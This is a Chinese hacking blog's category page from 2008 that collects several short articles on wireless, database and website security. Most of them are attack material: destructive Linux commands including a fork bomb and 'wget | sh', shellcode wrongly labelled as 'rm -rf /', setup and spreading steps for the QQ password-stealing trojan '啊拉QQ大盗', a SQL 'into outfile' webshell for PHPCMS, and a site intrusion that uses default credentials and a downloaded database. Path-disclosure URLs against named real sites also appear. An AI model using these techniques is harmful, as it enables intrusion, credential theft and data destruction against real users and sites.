Category: 脚本攻防

2008-12-19

无线大讲堂 你的企业无线网络安全吗?

归类于: 脚本攻防 - 19 Dec 2008

近年来,无线技术获得迅猛发展,由此而产生的业务则不仅仅涵盖了无线网络,它们还逐步集成了无线技术,并且还同其他相关组件融入到了有线架构中。无线访问局域网的需求,也随着移动终端的增长和用户渴望更方便访问网络而出现上升。

同其他创造性技术一样,使用无线局域网也同样面临机遇和挑战。无线网络给了新生一代富有创造力的那些黑客们劫持无线通信的机会,并且通过无线网络也可以扩展到与其相连的有线架构中。事实上,黑客们以前从来没有过这么好的机会。

一、无线局域网的不同之处

共享,不受控媒介

传统的有线网络使用线缆来输送信息,线缆就是一种受控媒介,它可贯穿在建筑物中受到保护。在连接到外部网络之间,则由防火墙或者防侵入技术进行保护。黑客或者侵入者要想访问有线网络,就必须越过这些物理设备或者防火墙。而无线网络则是利用空间传输信息,而空间是完全不受控并且是可共享的媒介物质–它缺乏相应的物理控制设备。一旦用户通过无线接入点连入网络,他所使用的信号就可以穿透墙壁、天花板和窗户,这也就使得不同楼层的其他用户或者毗邻楼宇、街道、公园等地方的用户也可以访问到整个网络。

据介绍,无线信号可以从单一的无线接入点传输到数英尺远的外部建筑物内。另外,无线设备也可以参与到空间的共享中来,网络中的任何一台无线设备都可以”看到”同处网络中其他无线设备的传输状况。

快速自动部署

相对来说,配置无线设备都比较简单,而且它还具有很好的移动特性。现在市场上的绝大多数笔记本电脑,也都支持无线功能。旧式的设备也可以通过添加无线网卡和驱动软件支持无线功能。同样地,一台笔记本电脑也可以很容易地变成接入点,因此,即使主观上无恶意的员工如果不考虑到适当的安全配置,也会使得无线站点和接入点至于安全风险之下。

设置数据库防止黑客入侵

归类于: 脚本攻防 - 19 Dec 2008

设置数据库防止黑客入侵

数据库,网站运营的基础,网站生存的要素,不管是个人用户还是企业用户都非常依赖网站数据库的支持,然而很多别有用心的攻击者也同样非常“看重”网站数据库。

对于个人网站来说,受到建站条件的制约,Access数据库成了广大个人网站站长的首选。然而,Access数据库本身存在很多安全隐患,攻击者一旦找到数据库文件的存储路径和文件名,后缀名为“.mdb”的Access数据库文件就会被下载,网站中的许多重要信息会被一览无余,非常可怕。当然,大家采用了各种措施来加强Access数据库文件的安全,但真的有效吗?

存在漏洞的保护措施

流传最为广泛的一种Access数据库文件保护措施,是将Access数据库文件的后缀名由“.mdb”改为“.asp”,接着再修改数据库连接文件(如conn.asp)中的数据库地址内容,这样一来即使别人知道数据库文件的文件名和存储位置,也无法进行下载。

这是网上最流行的一种增强Access数据库安全的方法,而且还有强大的“理论基础”。因为“.mdb”文件不会被IIS服务器处理,而是直接将内容输出到Web浏览器,而“.asp”文件则要经过IIS服务器处理,Web浏览器显示的是处理结果,并不是ASP文件的内容。

但大家忽略了一个很重要的问题,这就是IIS服务器到底处理了ASP文档中的哪些内容。这里提醒大家,只有ASP文件中“”标志符间的内容才会被IIS服务器处理,而其他内容则直接输出到用户的Web浏览器。你的数据库文件中包含这些特殊标志符吗?即使有,Access也可能会对文档中的“”标志符进行特殊处理,使之无效。因此后缀为“.asp”的数据库文件同样是不安全的,还是会被恶意下载。

面对蛊惑人心的理论,以及众人的附和,笔者也开始相信此方法的有效性。但事实胜于雄辩,一次无意间的试验,让笔者彻底揭穿了这个谣言。

笔者首先将一个名为“cpcw.mdb”的数据库文件改名为“cpcw.asp”,然后上传到网站服务器中。运行flashGet,进入“添加新的下载任务”对话框,在“网址”栏中输入“cpcw.asp”文件的存储路径,然后在“重命名”栏中输入“cpcw.mdb”。进行下载后,笔者发现可以很顺利地打开“cpcw.mdb”,而且它所存储的信息也被一览无余。这就充分说明了单纯地将数据库文件名的后缀“.mdb”改为“.asp”,还是存在安全隐患。

7条秒杀Linux的命令

归类于: 脚本攻防 - 19 Dec 2008

如果您使用Linux,可千万要记得不要让傻孩子们敲入以下命令,尽管这些命令看上去相当复杂,但还是会对你的系统造成严重影响.

有一些会影响你的程序和系统运行,有一些会直接把你的盘抹掉,这些命令几乎没有什么可以挽回的余地.

1. Code:

rm -rf /

这个很简单,根目录会被擦光.

2. Code:

char esp[] __attribute__ ((section(”.text”))) /* e.s.p

release */

= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″

“\x6e\x2f\x73\x68\x00\x2d\x63\x00″

“cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;”;

没看懂?呵呵,其实就是16进制的[rm -rf /].

3. Code:

mkfs.ext3 /dev/sda

抹盘行为无疑是危险的

4. Code:

:(){:|:&};:

这不是90后的表情,也不是托蒂射点球前的表情,它可以让你的系统迅速因为处理大量数据而死机.

5. Code:

any_command > /dev/sda

这个命令将会写入大量的RAW数据,可以导致数据丢失.

6. Code:

wget http://some_untrusted_source -O- | sh

和Windows一样,千万不要乱下载未经证实安全性的源,这年头Linux和胡萝卜一样,也不会保险.

7. Code:

mv /home/yourhomedirectory/* /dev/null

这条命令无疑会让系统抓狂,你的主目录会再也看不到.

黑客入侵嘉兴移动 盗发短信70万条

归类于: 脚本攻防 - 19 Dec 2008

钱江晚报消息:一些嘉兴移动用户今年六至七月间,常常收到莫名其妙的手机广告短信。在屡屡接到用户投诉后,嘉兴移动公司根据客户提供的短讯发送代码,查明短信是嘉兴某区司法部门发送的。

  司法部门发送广告?似乎不太可能。嘉兴移动公司怀疑,是不是有黑客入侵?他们立即报警,经过警方的缜密侦查,一起利用移动公司信息机盗发短信的案件浮出水面。

  在不到一个月的时间内,来自衢州的徐某在杭州利用互联网,63次非法远程侵入浙江移动公司嘉兴分公司机房的19台信息机,盗发短信73万余条,造成36000多元的损失。

  4年前,徐某大学毕业后,曾在杭州一家信息公司工作,维护绍兴地区的信息机。今年6月,他代理了某净水设备,想做些广告,又苦于资金不够,焦急中,他突然想到了移动公司信息机的IP地址,他找到了不花钱做广告的“妙计”??用网络远程登录信息机,盗发广告短信。

  为了不引起原单位的注意,他选择了嘉兴移动的信息机。这种做法让徐某尝到了甜头,也促使他萌生了另一个生财之道,那就是利用现有的办法为别人做广告赚钱。

  原先被侵入的信息机每天限发5万条,远远不能满足客户的需求,于是徐某搜肠刮肚,在互联网上下载了某扫描软件,扫描出与原有IP地址接近的其他地址,尝试着用初始用户名和密码登陆,让他大为欣喜的是,大部分信息机都能被成功登陆。他充分利用这些信息机资源,为客户发送内容包括百货公司、房地产、家教等大量广告信息。

  检察机关认为,徐某的行为已经涉嫌盗窃犯罪,不日将向法院提起公诉。

Cmd命令提示符被屏蔽 手工来破解

归类于: 脚本攻防 - 19 Dec 2008

1.新建个记事本.

2.在记事本内输入command 并保存.

3.把该记事本文件名改为dos.bat

4.接着只要打开该文件就可以使用命令提示符了.

这种方法适宜网吧里.

用U盘就可进入有密码的Windows系统

归类于: 脚本攻防 - 19 Dec 2008

U盘 如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!今天小编教你一招,能让你的U盘代 替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进入系统。怎么样,是不是很有兴趣一试?

要想成功实现上述功能,我们需要借助名为Disklogon的小工具,它是一个功 能强大的安全设置工具,可让我们使用优盘、软盘等移动设备来登录系统,可在登录时免于输入用户名和登录密码;而一旦移走了这些设备,系统便可以设置为自动 锁定或关机。下面就来看看如何设置让优盘变成控制登录系统的“密钥盘”。

点击进入Disklogon下载页面

完成软件安装之后按要求重新启动,之后在进入系统的画面中单击“Password”按钮,然后使用键盘输入密码登录(如果之前设置了使用密码登录的话)。但我们是不希望每次都这样繁琐的,下面就来设置一下让优盘发挥更强大的功能,让它直接来控制系统登录。

直接开始菜单中单击“Disklogon Options”进入设置界面,随后依次执行如下步骤设定:

Step1:依次执行“Options/Disklogon/Disks”操作,窗口右侧中默认将所有的盘符都勾选了,但我们只希望用优盘来作为密钥盘,所以只勾选优盘的盘符(例如笔者的为L:)。

Step2:单击窗口左侧的“Options/DiskLogon/General”分支,接下来,我们要在右侧设置有优盘和无优盘时的不同操作:

1.在“Disk removal behavior”下拉列表框中选择“Lock computer when the disk is removed”(当磁盘被取出后将电脑锁定),这样当优盘被拔除后系统就自动锁定了;如果想在拔除优盘后自动注销,则可选择“Log off when the disk is removed”。

2.在“Log on to Windows”下拉列表框中选择“Log on when disk is connected”(当链接有优盘时自动登录系统),这样,如果在开机后没有连接优盘,则不能进入系统。

3.在“Unlock computer”下拉列表框中选择“Unlock computer when …

防止盗QQ号的方法?彻底粉碎盗号者的阴谋

归类于: 脚本攻防 - 19 Dec 2008

很多朋友都有过QQ号被盗的经历,即使用“密码保护”功能找回来后,里面的Q币也已经被盗号者洗劫一空,碰到更恶毒的盗号者,还会将你的好友统统删除,朋友们将会永远得离开你。想过反击吗?什么,反击?别开玩笑了,我们只是菜鸟,不是黑客,我们只会看看网页,聊聊天,连QQ号是怎么被盗的都不知道,还能把盗号者怎么样呢?其实喜欢盗号的所谓“黑客”们,也只是利用了一些现成的盗号工具,只要我们了解了QQ号被盗的过程,就能作出相应防范,甚至由守转攻,给盗号者以致命一击。

  一、知己知彼,盗号技术不再神秘

  如今,还在持续更新的QQ盗号软件已经所剩无几,其中最为著名,流传最广的则非“啊拉QQ大盗”莫属,目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单,只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种,并将它们分别发送到不同的信箱中,这也是“啊拉QQ大盗”如此流行的原因之一。接下来,便让我们先来了解一下其工作原理,以便从中找到反击的良方。

  1、选择盗号模式

  下载“啊拉QQ大盗”,解压后有两个文件:alaqq.exe、爱永恒,爱保姆qq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序,爱永恒,爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前,还需要设置其参数。

  “邮箱收信”配置:运行alaqq.exe,出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”,在“邮箱收信”填写电子邮箱地址(建议使用程序默认的163.com网易的邮箱)。这里以邮箱n12345@163.com(密码n_12345)为例来介绍“邮箱收信”模式时的配置,并进行下文中的测试。此外,在“收信箱(靓)”和“收信箱(普)”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器,这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。

  设置完毕后,我们可以来测试一下填写的内容是否正确,点击下方“测试邮箱”按钮,程序将会出现邮箱测试状态。如果测试的项目都显示成功,即可完成邮箱信息配置。

  “网站收信”配置:除了选择“邮箱收信”模式之外,我们还可以选择“网站收信”模式,让盗取的QQ号码自动上传到指定的网站空间。当然,在使用之前,也需要做一些准备工作。

  用FTP软件将爱永恒,爱保姆qq.asp上传支持ASP脚本的空间,运行alaqq.exe,在“Asp接口地址”中输入爱永恒,爱保姆qq.asp所在的URL地址,那么,当木马截获QQ号码信息后,就会将其保存于爱永恒,爱保姆qq.asp同目录下的qq.txt文件中。

  2、设置木马附加参数

  接下来我们进行高级设置。如果勾选“运行后关闭QQ”,对方一旦运行“啊拉QQ大盗”生成的木马,QQ将会在60秒后自动关闭,当对方再次登录QQ后,其QQ号码和密码会被木马所截获,并发送到盗号者的邮箱或网站空间中。此外,如果希望该木马被用于网吧环境,那就需要勾选“还原精灵自动转存”,以便系统重起后仍能运行木马。除这两项外,其他保持默认即可。

  3、盗取QQ号码信息

  配置完“啊拉QQ大盗”,点击程序界面中的“生成木马”,即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏,或者和其他软件捆绑后进行传播。当有人运行相应的文件后,木马会隐藏到系统中,当系统中有QQ登录时,木马便会开始工作,将相关的号码及密码截取,并按照此前的设置,将这些信息发送到邮箱或者网站空间。

  二、练就慧眼,让木马在系统中无处可逃

  现在,我们已经了解了“啊拉QQ大盗”的一般流程,那么如何才能从系统中发现“啊拉QQ大盗”呢?一般来说,如果碰到了以下几种情况,那就应该小心了。

  ?QQ自动关闭。

  ?运行某一程序后其自身消失不见。

  ?运行某一程序后杀毒软件自动关闭。

  ?访问杀毒软件网站时浏览器被自动关闭。

  ?如果杀毒软件有邮件监控功能的,出现程序发送邮件的警告框。

  ?安装有网络防火墙(例如天网防火墙),出现NTdhcp.exe访问网络的警告。

  出现上述情况的一种或多种,系统就有可能已经感染了“啊拉QQ大盗”。当然,感染了木马并不可怕,我们同样可以将其从系统中清除出去。

  1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件,并在注册表的启动项中加入木马的键值,以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”,结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”,选择其中的“查看”标签,将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹,将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值,该键值位于HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentversionRun。

  2、卸载木马。卸载“啊拉QQ大盗”很简单,只要下载“啊拉QQ大盗”的配置程序,运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。

  三、以退为进,给盗号者以致命一击

  忙乎了半天,终于把系统中的“啊拉QQ大盗”彻底清除,那么,面对可恶的盗号者,我们是不是应该给他一个教训呢?

  1、利用漏洞,由守转攻

  这里所谓的“攻”,并不是直接入侵盗号者的电脑,相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手,从而给盗号者一个教训。

  那么这个漏洞是什么呢?

  从此前对“啊拉QQ大盗”的分析中可以看到,配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码,而邮箱的帐号和密码都是明文保存在木马程序中的。因此,我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱,让盗号者偷鸡不成反蚀把米。

  提示:以上漏洞仅存在于将QQ号码信息以邮件发送方式的木马,如果在配置“啊拉QQ大盗”的过程中选择使用网站接收的方式则不存在该漏洞。

  2、网络嗅探,反夺盗号者邮箱

  当木马截取到QQ号码和密码后,会将这些信息以电子邮件的形式发送到盗号者的邮箱,我们可以从这里入手,在木马发送邮件的过程中将网络数据包截取下来,这个被截获的数据包中就含有盗号者邮箱的帐号和密码。截取数据包时我们可以使用一些网络嗅探软件,这些嗅探软件可以很轻松得截取数据包并自动过滤出密码信息。

  ?x-sniff

  x-sniff是一款命令行下的嗅探工具,嗅探能力十分强大,尤其适合嗅探数据包中的密码信息。

  将下载下来的x-sniff解压到某个目录中,例如“c:“,然后运行”命令提示符“,在”命令提示符“中进入x-sniff所在的目录,然后输入命令”xsiff.exe-pass-hide-logpass.log“即可(命令含义:在后台运行x-sniff,从数据包中过滤出密码信息,并将嗅探到的密码信息保存到同目录下的pass.log文件中)。

  嗅探软件设置完毕,我们就可以正常登录QQ。此时,木马也开始运行起来,但由于我们已经运行x-sniff,木马发出的信息都将被截取。稍等片刻后,进入x-sniff所在的文件夹,打开pass.log,便可以发现x-sniff已经成功嗅探到邮箱的帐户和密码。

  ?sinffer

  可能很多朋友对命令行下的东西都有一种恐惧感,所以我们可以使用图形化的嗅探工具来进行嗅探。例如适合新手使用的sinffer。

  运行sinffer之前,我们需要安装WinPcap驱动,否则sinffer将不能正常运行。

GET PHPCMS2008 WEBSHELL

归类于: 脚本攻防 - 19 Dec 2008

进去后

Create TABLE b (cmd text NOT NULL);

Insert INTO b (cmd) VALUES(”);

//在字段cmd中插入一句话木马,木马内容为

前3句都?执行成功最后一句执行后显示空白

select cmd from b into outfile ‘E:\wwwroot\phpcms\phpcms\shell.php’;

步步渗透网站获得系统权限

归类于: 脚本攻防 - 19 Dec 2008

随着网络技术的快速发展网络安全问题越来越得到众多企业的重视,很多企业都在网上开展业务,发布了动态可以和用户交互的网站,然而动态网站带来强大互动功能的同时也存在着这样或那样的漏洞,他是一把双刃剑。最近笔者在对下属一个分支机构进行安全检查时发现了网站渗透漏洞,下面我们就来了解下此次网络安全攻防实战的全部内容,让我们从攻守两个方面了解网络特别是网站的安全,看看我们是如何一步步入侵网站并获得系统管理员权限的。

  一,前言:

  由于本文涉及的是攻防实战,所以在文章和图片中笔者对一些敏感信息和字样进行了删除处理,我们只讨论的是技术上的应用,希望各位读者不要对此分支站点进行额外的攻击。

  二,了解基本情况:

  扫描分支站点获得必要信息,从扫描的结果中我们可以了解到该分支站点使用了前台和后台的构建模式,另外网站也是由文章发布系统与论坛两部分组成,文章管理系统使用的是青创文章管理系统XP测试版,后面论坛使用的是动网,这些都是从访问和扫描分支站点时获得的信息,当然我们直接浏览文章管理系统和论坛也可以从其基本信息中查到有用数据。

三,从论坛入手入侵站点:

  首先我们选择比较好入侵的论坛作为“起手式”进行攻击,先用小榕的SQL注入工具扫描该网站,获得管理地址登录页面的信息,找到论坛和文章管理系统的后台管理地址,特别是论坛地址该分支站点选择的不是默认的/bbs,而是/book,这些都是通过扫描获得。

  (1)前台管理端的破解:

  安装过动网论坛的读者都知道默认的帐户名以及密码是admin和admin888,我们首先尝试使用此信息登录,正巧分支站点的网络管理员并没有修改这个前台管理端密码,我们成功登录。(如图1)

500)this.width=500″ border=0>

  另外从登录界面我们可以看到该分支站点使用的是动网BBS建立系统7.1的ACCESS版。(如图2)

500)this.width=500″ border=0>

  顺利的通过admin与admin888进入论坛管理端,不过由于动网BBS采用的前台管理与后台管理区别的安全防护措施,所以这个默认的前台管理端对于普通用户来说没有一点用处。(如图3)

500)this.width=500″ border=0>

  我们点击帐户对应的“管理”选项,他将带我们跳转到另外一个登录页面,需要我们输入真正有权限的后台管理信息,这个帐户与密码我们是不知道的。(如图4)

500)this.width=500″ border=0>

  (2)下载默认数据库文件:

  由于该论坛采用前台和后台双重帐户不同权限的双重防护安全措施,所以我们看看在别的地方有没有突破口,由于通过之前的信息收集和安全突破我们已经了解了该站点采用的论坛是动网BBS建立系统7.1的ACCESS版,一般来说默认情况这个版本论坛的数据库存放的相对地址为data/dvbbs7.mdb,因此我们尝试通过http://xxx/book/data/dvbbs7.mdb这个地址来下载数据库文件(book是我们之前扫描出的论坛发布相对路径)。输入该地址后如果出现提示文件下载窗口的话,这就说明该管理员没有修改默认的数据库文件存放地址,我们可以轻轻松松的将论坛数据库文件dvbbs7.mdb下载到本机。(如图5)

500)this.width=500″ border=0>

(3)分析数据库文件获得后台管理密码:

  我们已经知道该论坛使用的是ACCESS数据库,所以用ACCESS打开下载的dvbbs7.mdb文件即可,打开文件后该论坛数据库对应的各个表一一呈现在我们面前。(如图6)

500)this.width=500″ border=0>

  我们可以通过分析数据库表和各个参数的方法进一步了解论坛的系统信息,当然在这里笔者教大家一个简单的方法来通过数据库文件破解管理员后台密码。在动网论坛对应的ACCESS数据库文件中有一个Dv_log名称的表,这个表里面存储的是论坛登录和各个操作记录信息,例如平时的修改密码操作也会存储在这里,这样我们就可以通过分析Dv_log表中的日志记录信息获取管理员后台密码了。打开Dv_log表我们从上到下按照时间查看各个日志记录信息,当看到时间上最新一次oldusername,username,password2等字眼对应的列信息出现时就说明我们的入侵将有更深入进展,在“password2=”后面我们可以看到明文的管理员后台密码。(如图7)

500)this.width=500″ border=0>

  小提示:

  如果数据太多的话我们可以直接搜索pass关键字,这样也可以快速定位要找的信息。

  (4)进入后台管理界面:

  通过破解数据库及日志表中对应信息的方法我们可以得到管理员(后台)帐户及密码,这个帐户对应的权限就非常高了,可以对论坛各种参数信息进行设置,我们通过论坛管理地址使用此帐户信息登录。(如图8)

500)this.width=500″ border=0>

  输入正确后我们就可以顺利的访问论坛后台管理界面了,这里我们可以针对论坛的基本信息,用户信息,版块设置,管理员设置,论坛各个基本参数等多个数据随意设置了。(如图9)

500)this.width=500″ border=0> …

一些爆路径tips

归类于: 脚本攻防 - 19 Dec 2008

站长网 dedecms爆目录方法

http://chinaz.com/include/htmledit/index.php?modetype=basic&height[]=airpig

Fatal error: Unsupported operand types in E:\2008.chinaz\include\htmledit\index.php on line 7

这些都是利用cms漏洞

然后说下Phpmyadmin

这个比较多

基本上用phpmyadmin的站90%都可以爆目录

上次记得搞百度的时候 就发现个 后来管理员改还真快

http://xxxx.baidu.com/...../phpmyadmin/libraries/export/xls.php

Warning: main(Spreadsheet/Excel/Writer.php) [function.main]: failed to open stream: No such file or directory in /home/work/local/apache/htdocs/phpmyadmin/libraries/export/xls.php on line 5

Fatal error: main() [function.require]: Failed …

下一页 »